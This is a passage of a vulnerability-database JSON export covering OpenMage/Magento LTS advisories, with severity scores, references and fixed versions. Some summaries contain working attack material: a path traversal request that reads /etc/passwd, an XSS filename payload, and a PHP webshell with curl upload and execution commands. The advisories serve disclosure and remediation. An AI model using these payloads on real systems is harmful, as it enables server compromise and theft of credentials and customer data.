"http://public2.vulnerablecode.io/vulnerabilities/VCID-b7ua-zfks-fyg5" }, { "url": 
"http://public2.vulnerablecode.io/api/vulnerabilities/89610?format=api", "vulnerability_id": "VCID-cbms-5g8f-wyg6", "summary": "OpenMage LTS has a Path Traversal Filter Bypass in Dataflow Module\nThe Dataflow module in OpenMage LTS uses a weak blacklist filter (`str_replace('../', '', $input)`) to prevent path traversal attacks. This filter can be bypassed using patterns like `..././` or `....//`, which after the replacement still result in `../`. An authenticated administrator can exploit this to read arbitrary files from the server filesystem.\n\n\n| Metric | Value | Justification |\n| ------------------------ | --------- | ------------------------------------- |\n| Attack Vector (AV) | Network | Exploitable via admin panel |\n| Attack Complexity (AC) | Low | Simple bypass pattern |\n| Privileges Required (PR) | High | Requires admin authentication |\n| User Interaction (UI) | None | No additional user interaction needed |\n| Scope (S) | Unchanged | Impacts the vulnerable component |\n| Confidentiality (C) | High | Can read sensitive system files |\n| Integrity (I) | None | Read-only vulnerability |\n| Availability (A) | None | No impact on availability |\n\n## Affected Products\n\n- OpenMage LTS versions < 20.16.1\n- All versions derived from Magento 1.x with these code paths\n\n## Affected Files\n\n| File | Line | Vulnerable Code |\n| ------------------------------------------------------------ | ---- | ---------------------------------------- |\n| `app/code/core/Mage/Dataflow/Model/Convert/Parser/Csv.php` | 67 | `str_replace('../', '', urldecode(...))` |\n| `app/code/core/Mage/Dataflow/Model/Convert/Parser/Xml/Excel.php` | 63 | `str_replace('../', '', urldecode(...))` |\n\n## Vulnerability Details\n\nThe Dataflow module allows administrators to import data from files. The `files` parameter specifies which file to import from the `var/import/` directory. 
To prevent path traversal, the code uses `str_replace()` to remove `../` sequences:\n\n```php\n$file = Mage::app()->getConfig()->getTempVarDir() . '/import/'\n . str_replace('../', '', urldecode(Mage::app()->getRequest()->getParam('files')));\n```\n\nHowever, `str_replace()` only performs a single pass, making it trivially bypassable:\n\n### Bypass Examples\n\n| Input | After `str_replace('../', '', ...)` | Result |\n| ------------------------------ | ----------------------------------- | --------- |\n| `..././` | `../` | Bypass |\n| `....//` | `../` | Bypass |\n| `..././..././..././etc/passwd` | `../../../etc/passwd` | File read |\n\n### Attack Scenario\n\n1. Attacker gains admin access (via compromised credentials, social engineering, etc.)\n2. Navigate to System > Import/Export > Dataflow Profiles\n3. Create or modify an import profile\n4. Set the `files` parameter to: `..././..././..././etc/passwd`\n5. Run the profile to read the contents of `/etc/passwd`\n\n### Proof of Concept\n\n```\n# Request to Dataflow with bypass pattern\nGET /admin/system_convert_gui/run/id/1/?files=..././..././..././etc/passwd\n\n# The str_replace removes '../' leaving:\n# ..././..././..././etc/passwd -> ../../../etc/passwd\n\n# Final path resolves to:\n# /var/www/html/var/import/../../../etc/passwd -> /etc/passwd\n```\n\n## Remediation\n\nReplace the weak `str_replace()` filter with `basename()` to extract only the filename:\n\n```php\n// Before (vulnerable)\n$file = Mage::app()->getConfig()->getTempVarDir() . '/import/'\n . str_replace('../', '', urldecode(Mage::app()->getRequest()->getParam('files')));\n\n// After (fixed)\n$file = Mage::app()->getConfig()->getTempVarDir() . '/import/'\n . basename(urldecode(Mage::app()->getRequest()->getParam('files')));\n```\n\nUsing `basename()` ensures only the filename portion is used, completely preventing any path traversal regardless of the input pattern.\n\n## Workarounds\n\nIf immediate upgrade is not possible:\n\n1. 
**Restrict admin access**: Limit Dataflow access to trusted administrators only\n2. **Disable Dataflow**: If not in use, disable the Dataflow module entirely\n3. **Web Application Firewall**: Block requests containing path traversal patterns\n4. **File permissions**: Ensure the web server user has minimal filesystem permissions\n5. **Monitor admin activity**: Alert on suspicious Dataflow profile execution\n\n## Impact\n\nAn attacker with admin access can read sensitive files including:\n\n- `/etc/passwd` - System user information\n- `app/etc/local.xml` - Database credentials\n- `.env` files - Environment secrets\n- Log files - Potentially sensitive application data\n- Configuration files - Server and application configuration\n\n## Credit\n\nThis vulnerability was discovered and responsibly disclosed by [blackhat2013](https://hackerone.com/blackhat2013) through HackerOne.\n\n## Timeline\n\n- **2025-12-31**: Vulnerability reported via HackerOne\n- **2026-01-21**: Fix developed and tested", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25525", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21007", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21071", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21115", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21128", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25525" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", 
"scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/pull/5445", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/pull/5445" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-6vqf-6fhm-7rc6", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:27:13Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-6vqf-6fhm-7rc6" }, { "reference_url": "https://hackerone.com/reports/3482926", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://hackerone.com/reports/3482926" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25525", 
"reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25525" }, { "reference_url": "https://github.com/advisories/GHSA-6vqf-6fhm-7rc6", "reference_id": "GHSA-6vqf-6fhm-7rc6", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6vqf-6fhm-7rc6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110814?format=api", "purl": "pkg:composer/openmage/magento-lts@20.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.17.0" } ], "aliases": [ "CVE-2026-25525", "GHSA-6vqf-6fhm-7rc6" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cbms-5g8f-wyg6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47140?format=api", "vulnerability_id": "VCID-dg5g-wnuf-ryad", "summary": "Magento LTS vulnerable to stored XSS in admin file form\n### Summary\nOpenMage is affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields.\n\n### Details\n`Mage_Adminhtml_Block_System_Config_Form_Field_File` does not escape filename value in certain situations.\nSame as: https://nvd.nist.gov/vuln/detail/CVE-2024-20717\n\n### PoC\n1. Create empty file with this filename: `<img src=x onerror=alert(1)>.crt`\n2. 
Go to _System_ > _Configuration_ > _Sales | Payment Methods_.\n3. Click **Configure** on _PayPal Express Checkout_.\n4. Choose **API Certificate** from dropdown _API Authentication Methods_.\n5. Choose the XSS-file and click **Save Config**.\n6. Profit, alerts \"1\" -> XSS.\n7. Reload, alerts \"1\" -> Stored XSS.\n\n### Impact\nAffects admins that have access to any file-upload field in admin in core or custom implementations.\nMalicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", "references": [ { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20717", "reference_id": "CVE-2024-20717", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20717" }, { "reference_url": "https://github.com/advisories/GHSA-gp6m-fq6h-cjcx", "reference_id": "GHSA-gp6m-fq6h-cjcx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gp6m-fq6h-cjcx" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-gp6m-fq6h-cjcx", "reference_id": "GHSA-gp6m-fq6h-cjcx", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", 
"scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-gp6m-fq6h-cjcx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69177?format=api", "purl": "pkg:composer/openmage/magento-lts@20.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.5.0" } ], "aliases": [ "GHSA-gp6m-fq6h-cjcx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dg5g-wnuf-ryad" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44322?format=api", "vulnerability_id": "VCID-dj3k-4q1f-xfbh", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41144", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00598", "scoring_system": "epss", "scoring_elements": "0.69783", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00598", "scoring_system": "epss", "scoring_elements": "0.69811", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00598", "scoring_system": "epss", "scoring_elements": "0.69831", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00598", 
"scoring_system": "epss", "scoring_elements": "0.69822", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41144" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/06c45940ba3256cdfc9feea12a3c0ca56d23acf8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:18Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/06c45940ba3256cdfc9feea12a3c0ca56d23acf8" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:18Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", 
"scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:18Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41144", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41144" }, { "reference_url": "https://github.com/advisories/GHSA-5j2g-3ph4-rgvm", "reference_id": "GHSA-5j2g-3ph4-rgvm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5j2g-3ph4-rgvm" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5j2g-3ph4-rgvm", "reference_id": "GHSA-5j2g-3ph4-rgvm", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:18Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5j2g-3ph4-rgvm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": 
"VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-41144", "GHSA-5j2g-3ph4-rgvm", "GMS-2023-154" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dj3k-4q1f-xfbh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89723?format=api", "vulnerability_id": "VCID-fken-twwj-gkaq", "summary": "OpenMage LTS: Customer File Upload Extension Blocklist Bypass → Remote Code Execution\nThe product custom option file upload in OpenMage LTS uses an incomplete blocklist (`forbidden_extensions = php,exe`) to prevent dangerous file uploads. This blocklist can be trivially bypassed by using alternative PHP-executable extensions such as `.phtml`, `.phar`, `.php3`, `.php4`, `.php5`, `.php7`, and `.pht`. 
Files are stored in the publicly accessible `media/custom_options/quote/` directory, which lacks server-side execution restrictions for some configurations, enabling Remote Code Execution if this directory is not explicitly denied script execution.\n\n## Affected Version\n\n- **Project:** OpenMage/magento-lts\n- **Vulnerable File:** `https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php`\n- **Vulnerable Lines:** 230-237 (`_validateUploadedFile()`)\n- **Configuration:** `app/code/core/Mage/Catalog/etc/config.xml:824`\n\n## Root Cause\n\nThe file upload handler uses `Zend_File_Transfer_Adapter_Http` directly with `ExcludeExtension` validator, referencing only:\n\n```xml\n<!-- Catalog/etc/config.xml:824 -->\n<forbidden_extensions>php,exe</forbidden_extensions>\n```\n\nThis misses the comprehensive `protected_extensions` blocklist defined elsewhere:\n\n```xml\n<!-- Core/etc/config.xml:449-478 -->\nphp, php3, php4, php5, php7, htaccess, jsp, pl, py, asp, sh, cgi, \nhtm, html, pht, phtml, shtml\n```\n\n## Vulnerable Code\n\n```php\n// app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php:230-237\n$_allowed = $this->_parseExtensionsString($option->getFileExtension());\nif ($_allowed !== null) {\n $upload->addValidator('Extension', false, $_allowed);\n} else {\n $_forbidden = $this->_parseExtensionsString($this->getConfigData('forbidden_extensions'));\n if ($_forbidden !== null) {\n $upload->addValidator('ExcludeExtension', false, $_forbidden); // Only blocks php,exe!\n }\n}\n```\n\n## Steps to Reproduce\n\n### 1. Environment Setup\n\nTarget: OpenMage LTS with Apache+mod_php or Apache+PHP-FPM (with .phtml handler)\n\n### 2. 
Exploitation\n\n\n```bash\n# Upload .phtml (bypasses blocklist)\ncurl -X POST \"https://target.com/vulnerable_upload.php\" \\\n -F \"file=@shell.phtml;filename=shell.phtml\"\n```\n\n**Result:** \n<img width=\"1563\" height=\"733\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c56d43e8-364a-4402-8198-9f49a50fd691\" />\n\n### 3. Code Execution\n\nOpenMage derives the uploaded file's storage path deterministically from two values the attacker\nalready controls:\n\n**Subdirectory** — `getDispretionPath($filename)` takes the **first two characters** of the\nuploaded filename and uses them as nested directory names:\n\n```\nfilename = \"shell.phtml\" → s/ h/ → media/custom_options/quote/s/h/\n```\n\n**Filename** — `md5(file_get_contents($tmp_name))` is computed over the **raw bytes of the\nuploaded payload** (`File.php:245`):\n\n```php\n// app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php:245\n$fileHash = md5(file_get_contents($fileInfo['tmp_name']));\n$filePath = $dispersion . DS . $fileHash . '.' . $extension;\n```\n\nBecause the attacker writes the webshell themselves, both the filename prefix and file contents are\nknown **before the upload request is sent**. 
The full URL can be pre-computed:\n\n```bash\nSHELL_CONTENT='<?php echo exec(\"id\"); system($_GET[\"cmd\"]??\"id\"); ?>\\n'\nHASH=$(echo -n \"$SHELL_CONTENT\" | md5sum | cut -d' ' -f1)\nPREFIX=$(echo \"shell\" | cut -c1-2 | sed 's/./&\\//g' | tr -d '\\n' | sed 's/\\/$//') # → s/h\n```\n\n```bash\ncurl \"https://target.com/media/custom_options/quote/d9/bb4d647f16d9e7edfe49216140de2879.phtml\"\n```\n\n**Result:** RCE Confirmed\n\n<img width=\"1559\" height=\"827\" alt=\"image\" src=\"https://github.com/user-attachments/assets/12990f06-8750-48e6-87c5-add18b9e7260\" />\n\n## Affected Deployments\n\n| Configuration | Status |\n|---------------|--------|\n| Apache + mod_php (with `php_flag engine 0`) | SAFE |\n| Apache + PHP-FPM | **VULNERABLE** |\n| Nginx (reference hardened config) | SAFE |\n| Nginx (generic config with .phtml→FPM) | **VULNERABLE** |\n\n## Impact\n\n1. **Remote Code Execution:** Full server compromise through webshell upload\n2. **Data Exfiltration:** Access to database credentials, customer PII, payment data\n3. **Lateral Movement:** Pivot to internal infrastructure\n4. 
**Supply Chain:** Inject malicious code into served content", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40488", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25511", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25406", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25465", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25524", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40488" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3j5q-7q7h-2hhv", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-20T16:44:14Z/" } ], "url": 
"https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3j5q-7q7h-2hhv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40488", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40488" }, { "reference_url": "https://github.com/advisories/GHSA-3j5q-7q7h-2hhv", "reference_id": "GHSA-3j5q-7q7h-2hhv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3j5q-7q7h-2hhv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110814?format=api", "purl": "pkg:composer/openmage/magento-lts@20.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.17.0" } ], "aliases": [ "CVE-2026-40488", "GHSA-3j5q-7q7h-2hhv" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fken-twwj-gkaq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44306?format=api", "vulnerability_id": "VCID-g75g-ab3s-y7db", "summary": "Cross-Site Request Forgery (CSRF) in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21395", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25278", "published_at": 
"2026-06-05T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25154", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25211", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25182", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25261", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21395" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://hackerone.com/reports/1086752", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": 
